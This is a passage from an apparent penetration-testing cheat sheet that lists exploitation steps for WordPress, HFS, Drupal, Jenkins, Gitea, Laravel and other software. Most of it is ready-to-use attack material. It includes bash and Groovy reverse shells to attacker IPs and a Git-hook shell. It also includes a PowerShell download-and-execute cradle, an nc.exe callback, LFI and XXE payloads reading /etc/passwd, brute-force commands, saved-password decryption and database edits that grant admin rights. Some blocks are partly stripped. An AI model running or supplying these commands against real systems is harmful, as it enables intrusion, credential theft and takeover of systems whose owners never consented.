root:toor 4320 | 4321 | # Reverse Shell 4322 | ## Plugins (plugin header and shell source stripped in rendering; original lines 4324-4334 are missing) 4323 | /dev/tcp/10.10.10.10/443 0>&1'"); 4335 | ?> 4336 | 4337 | - save as shell.php 4338 | - zip shell.zip shell.php 4339 | 4340 | # Manual Plugin Fuzzing 4341 | -> Scrape all plugin names 4342 | -> curl -s -k http://plugins.svn.wordpress.org/ | grep -i href| grep -i li | cut -d"\"" -f2 > plugins.txt 4343 | 4344 | # Vulnerable Plugins 4345 | ##===CVE-2014-2383=== 4346 | - /wp-content/plugins/post-pdf-export/images/download-icon.png 4347 | - /dompdf.php?input_file=php://filter/read=convert.base64-encode/resource=/etc/passwd 4348 | - https://www.portcullis-security.com/security-research-and-downloads/security-advisories/cve-2014-2383/ 4349 | 4350 | ##===CVE-2021-29447=== 4351 | 1. Create evil.dtd (DTD contents stripped in rendering; only the closing fragment survives) 4352 | 4353 | " > 4354 | 4355 | 2. Create payload.wav 4356 | echo -en 'RIFF\xb8\x00\x00\x00WAVEiXML\x7b\x00\x00\x00%remote;%init;%trick;]>\x00' > payload.wav 4357 | 4358 | 3. Host 4359 | php -S 0.0.0.0:80 4360 | 4361 | 4. Upload payload.wav to WordPress 4362 | 4363 | 5. 
Look at php server 4364 | - https://blog.wpsec.com/wordpress-xxe-in-media-library-cve-2021-29447/ 4365 | ``` 4366 | 4367 | ### NibbleBlog 4368 | 4369 | ```bash 4370 | # Download Exploit Here 4371 | wget https://raw.githubusercontent.com/TheRealHetfield/exploits/master/nibbleBlog_fileUpload.py 4372 | 4373 | # Commands 4374 | #==Manual== 4375 | # Step 1: 4376 | - Go to http://10.10.10.10/nibbleblog/admin.php?controller=plugins&action=config&plugin=my_image 4377 | - Upload php reverse shell 4378 | # Step 2 4379 | - Listening 4380 | - Go to http://10.10.10.10/nibbleblog/content/private/plugins/my_image/image.php 4381 | ``` 4382 | 4383 | ### HTTPFileServer 4384 | 4385 | ```bash 4386 | # Links 4387 | - https://www.exploit-db.com/exploits/49125 4388 | * python3 exploit3.py 10.10.10.10 80 "c:\windows\system32\WindowsPowershell\v1.0\powershell.exe IEX (New-Object Net.WebClient).DownloadString('http://10.10.10.11/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.10.10.11 -Port 443" 4389 | * python3 exploit3.py 10.10.10.10 80 "C:\Users\kostas\Desktop\nc.exe -e cmd.exe 10.10.10.11 443" 4390 | - https://www.exploit-db.com/exploits/39161 4391 | * Change lhost,lport 4392 | - https://www.exploit-db.com/exploits/49584 4393 | * Change lhost,lport,rhost,rport (Depends windows version) 4394 | ``` 4395 | 4396 | ### Joomla 4397 | 4398 | ```bash 4399 | => Scanner 4400 | $ 4401 | 4402 | => References 4403 | $ https://www.itoctopus.com/how-to-quickly-know-the-version-of-any-joomla-website 4404 | $ https://www.exploit-db.com/docs/english/22763-guidelines-for-pentesting-a-joomla-based-site.pdf 4405 | ``` 4406 | 4407 | ### Drupal 4408 | 4409 | ```bash 4410 | # Scanner 4411 | ## drupwn 4412 | git clone https://github.com/immunIT/drupwn.git 4413 | python3 -m pip install -r requirements.txt 4414 | ./drupwn --target http://10.10.10.9/ --mode enum 4415 | 4416 | ##droopescan 4417 | droopescan scan drupal -u http://10.10.10.9/ 4418 | 4419 | # 7.x Exploit 4420 | 
https://www.exploit-db.com/exploits/41564 4421 | searchsploit -x php/webapps/44449.rb > exploit.rb 4422 | - ruby exploit.rb http://10.10.10.10./ --verbose 4423 | ``` 4424 | 4425 | ### Elastix 4426 | 4427 | ```bash 4428 | # Download 4429 | searchsploit -x php/webapps/18650.py > output.py 4430 | 4431 | # Usage 4432 | - Change lport 4433 | - Run 4434 | 4435 | # Lfi 4436 | /vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action 4437 | ``` 4438 | 4439 | ### CMS Made Simple 4440 | 4441 | ```bash 4442 | # SQL Injection 4443 | https://www.exploit-db.com/exploits/46635 4444 | 4445 | # Usage 4446 | python exploit.py -u http://10.10.10.10/writeup 4447 | ``` 4448 | 4449 | 4450 | ### Umbraco 4451 | 4452 | ```bash 4453 | # Download 4454 | git clone https://github.com/noraj/Umbraco-RCE.git 4455 | 4456 | # Usage 4457 | python exploit.py -u 'user@email.com' -p 'password' -i http://10.10.10.10 -c powershell.exe -a 'whoami' 4458 | ``` 4459 | 4460 | ### PlaySMS 4461 | 4462 | ```bash 4463 | # Metasploit Module 4464 | use multi/http/playsms_uploadcsv_exec 4465 | ``` 4466 | 4467 | ### ThinVNC 4468 | 4469 | ```bash 4470 | # File Traversal - Better use burpsuite 4471 | - http://IP:PORT//../../ThinVnc.ini 4472 | ``` 4473 | 4474 | 4475 | ### Voting System 4476 | 4477 | ```bash 4478 | # File Upload RCE 4479 | https://www.exploit-db.com/exploits/49445 4480 | 4481 | # References 4482 | https://www.sourcecodester.com/php/12306/voting-system-using-php.html 4483 | ``` 4484 | 4485 | ### Osticket 4486 | 4487 | ```bash 4488 | # File location 4489 | /var/www/osticket/upload/include/ost_config.php 4490 | ``` 4491 | 4492 | ### SharePoints 4493 | 4494 | ```bash 4495 | # Wordlists 4496 | locate sharepoint | grep txt 4497 | /pathto/SecLists/Discovery/Web-Content/CMS/sharepoint.txt 4498 | /usr/share/dirb/wordlists/vulns/sharepoint.txt 4499 | /usr/share/wfuzz/wordlist/vulns/sharepoint.txt 4500 | 
/usr/share/windows-resources/powersploit/Recon/Dictionaries/sharepoint.txt 4501 | 4502 | # User Enumeration 4503 | http://example.com/_layouts/userdisp.aspx?id=1 4504 | http://example.com/_layouts/15/userdisp.aspx?id=1 4505 | http://example.com/site/path/_layouts/15/userdisp.aspx?id=1 4506 | http://example.com/site/path/_layouts/userdisp.aspx?id=1 4507 | 4508 | # Web Services 4509 | http://example.com/_vti_bin/spsdisco.aspx 4510 | 4511 | # References 4512 | https://hackingprofessional.github.io/HTB/Hacking-a-sharepoint-website/ 4513 | https://the-infosec.com/2017/04/18/penetration-testing-sharepoint/ 4514 | https://www.crummie5.club/the-lone-sharepoint/ 4515 | https://www.mdsec.co.uk/2020/03/a-security-review-of-sharepoint-site-pages/ 4516 | https://www.defcon.org/images/defcon-11/dc-11-presentations/dc-11-Shannon/presentations/dc-11-shannon.pdf 4517 | https://pentest-tools.com/public/sample-reports/sharepoint-scan-sample-report.pdf 4518 | https://trojand.com/cheatsheet/Methodologies/Sharepoint.html 4519 | http://sparty.secniche.org/ 4520 | https://hackmag.com/security/sharepoint-serving-the-hacker/ 4521 | https://github.com/helloitsliam/Hacking/blob/master/SharePoint-URLs 4522 | https://github.com/bhasbor/SharePointURLBrute-v1.1/blob/master/SharePoint-UrlExtensions-18Mar2012.txt 4523 | https://www.youtube.com/watch?v=aXFnO_PzaIw 4524 | ``` 4525 | 4526 | ### Rejetto File Server 4527 | 4528 | ```bash 4529 | # Exploit 4530 | https://www.exploit-db.com/exploits/39161 4531 | https://www.exploit-db.com/exploits/49584 4532 | 4533 | # Payload (UrlEncode) 4534 | # Execute File 4535 | ?search=%00{.exec%7Cwscript.exe%20//B%20//NOLOGO%20%25TEMP%25%5Cpayload.vbs.} 4536 | 4537 | # Payload (UrlDecode) 4538 | # Execute File 4539 | ?search= {.exec|wscript.exe //B //NOLOGO %TEMP%\payload.vbs.} 4540 | ``` 4541 | 4542 | ### Phreebooks 4543 | 4544 | ```bash 4545 | # PhreeBooks 5.2.3 ERP - Remote Code Execution 4546 | https://www.exploit-db.com/exploits/49524 4547 | 
https://www.exploit-db.com/exploits/46645 4548 | ``` 4549 | 4550 | ### mRemoteNG 4551 | 4552 | ```bash 4553 | # Decrypt (saved connection passwords) 4554 | https://github.com/gquere/mRemoteNG_password_decrypt 4555 | https://github.com/haseebT/mRemoteNG-Decrypt.git 4556 | 4557 | # Commands 4558 | python3 mremoteng_decrypt.py -s "" 4559 | ``` 4560 | 4561 | ### Webmin 4562 | 4563 | ```bash 4564 | # < 1.290 4565 | https://www.exploit-db.com/exploits/2017 4566 | ## Commands 4567 | perl exploit.pl 10.10.10.10 10000 /etc/passwd 0 4568 | ``` 4569 | 4570 | ### Jenkins 4571 | 4572 | ```bash 4573 | # Bruteforce (hydra) 4574 | hydra -l admin -P rockyou.txt 10.10.10.10 -s 30609 http-post-form 4575 | "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in:F=loginError" 4576 | 4577 | # Reverse shell (Linux) 4578 | r = Runtime.getRuntime() 4579 | p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/10.10.10.10/443;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[]) 4580 | p.waitFor() 4581 | 4582 | ``` 4583 | 4584 | ### Gitea 4585 | 4586 | ```bash 4587 | # Location 4588 | /etc/gitea 4589 | 4590 | # Reverse Shell 4591 | - Choose one repo 4592 | - Go to Git Hooks 4593 | - Put the reverse shell in the contents of the post-receive hook 4594 | 4595 | #!/bin/bash 4596 | bash -i >& /dev/tcp/10.4.3.51/443 0>&1 4597 | 4598 | - git clone, git add . and git commit (the hook runs on push). 
4599 | 4600 | # Database (Change Password) 4601 | sqlite3 database.db 4602 | select passwd from user; 4603 | select passwd_hash_algo from user; 4604 | select 4605 | 4606 | # Database (Change is_admin) 4607 | sqlite3 database.db 4608 | select id,name,is_admin from user; 4609 | update user set is_admin=1 where id=3; 4610 | ``` 4611 | 4612 | ### ES File Explorer Open Port Vulnerability (CVE-2019-6447) 4613 | 4614 | ```bash 4615 | => Download 4616 | $ https://www.exploit-db.com/exploits/50070 4617 | 4618 | => Commands 4619 | $ python3 exploit.py listApps 10.10.10.10 4620 | $ python3 exploit.py listFiles 10.10.10.10 4621 | $ python3 exploit.py listAppsSdcard 10.10.10.10 4622 | $ python3 exploit.py getDeviceInfo 10.10.10.10 4623 | $ python3 exploit.py listAppsPhone 10.10.10.10 4624 | $ python3 exploit.py listPics 10.10.10.10 4625 | 4626 | => References 4627 | $ https://medium.com/@knownsec404team/analysis-of-es-file-explorer-security-vulnerability-cve-2019-6447-7f34407ed566 4628 | ``` 4629 | 4630 | ### Strapi 4631 | 4632 | ```bash 4633 | # RCE 4634 | https://www.exploit-db.com/exploits/50239 4635 | => python3 exploit.py http://localhost/ 4636 | ``` 4637 | 4638 | ### Laravel 4639 | 4640 | ```bash 4641 | # Laravel Debug RCE (CVE-2021-3129) 4642 | https://github.com/zhzyker/CVE-2021-3129 4643 | => python3 exp.py http://localhost:8000/ 4644 | => To get reverse shell change `id` to any reverse shell 4645 | ``` 4646 | 4647 | # F. 
Bug Bounty 4648 | 4649 | ### Subdomain Methodology 4650 | 4651 | ```bash 4652 | # crt.sh (@vict0ni) 4653 | curl -k -s "https://crt.sh/?q=example&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u 4654 | 4655 | # Archive (@pikpikcu) 4656 | curl -s "http://web.archive.org/cdx/search/cdx?url=*.example.com/*&output=text&fl=original&collapse=urlkey" | sed -e 's_https*://__' -e "s/\/.*//" | sort -u 4657 | 4658 | # References 4659 | https://reposhub.com/python/learning-tutorial/dwisiswant0-awesome-oneliner-bugbounty.html 4660 | ``` 4661 | 4662 | # G. Reverse Shell 4663 | 4664 | ### PowerShell 4665 | 4666 | ```powershell 4667 | # ConPtyShell (Interactive Powershell) 4668 | 4669 | ``` 4670 | 4671 | ### web.config (ASP) 4672 | 4673 | ```bash 4674 | 4675 | 4676 | 4677 | 4678 | 4679 | 4680 | 4681 | 4682 | 4683 | 4684 | 4685 | 4686 | 4687 | 4688 | 4689 | 4690 | 4691 | 4692 | 4700 | ``` 4701 | # References 4702 | - https://github.com/swisskyrepo/PayloadsAllTheThings 4703 | - https://book.hacktricks.xyz/ 4704 | - https://gist.github.com/jivoi/c354eaaf3019352ce32522f916c03d70 4705 | - https://zer1t0.gitlab.io/posts/attacking_ad/ 4706 | - https://pentestbook.six2dez.com/ 4707 | - https://soroush.secproject.com/blog/2014/07/upload-a-web-config-file-for-fun-profit/ 4708 | - https://github.com/vulhub/vulhub --------------------------------------------------------------------------------